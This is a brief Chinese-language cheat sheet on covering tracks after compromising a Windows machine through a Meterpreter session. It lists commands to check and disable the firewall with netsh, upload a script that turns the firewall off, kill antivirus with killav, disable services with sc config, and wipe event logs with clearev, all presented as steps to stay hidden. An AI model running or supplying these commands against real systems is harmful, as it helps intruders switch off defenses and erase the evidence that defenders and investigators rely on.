清除痕迹
下一个阶段是借助日志删除清除痕迹,以及禁用防火墙和防护系统以保持隐蔽状态。
打开meterpreter连接会话
查看防火墙状态
run getcountermeasure
或者打开shell
netsh firewall show opmode
改用
netsh advfirewall firewall
关闭防火墙
netsh firewall set opmode mode=disable
上传脚本文件,关闭防火墙
upload <源文件位置> <目标文件位置>
upload /root/desktop/disable.vbs c:\
关掉杀毒软件
run killav
tasklist
筛选服务
tasklist /svc | find /I "svchost"
查看服务的属性
sc queryex WpnUserService_ac9f1
禁用服务进程
sc config WpnUserService_ac9f1 start=disabled
参数说明
reboot重启系统
清除日志事件
clearev
新的模块,新的系统已经在更新,请了解新的信息。
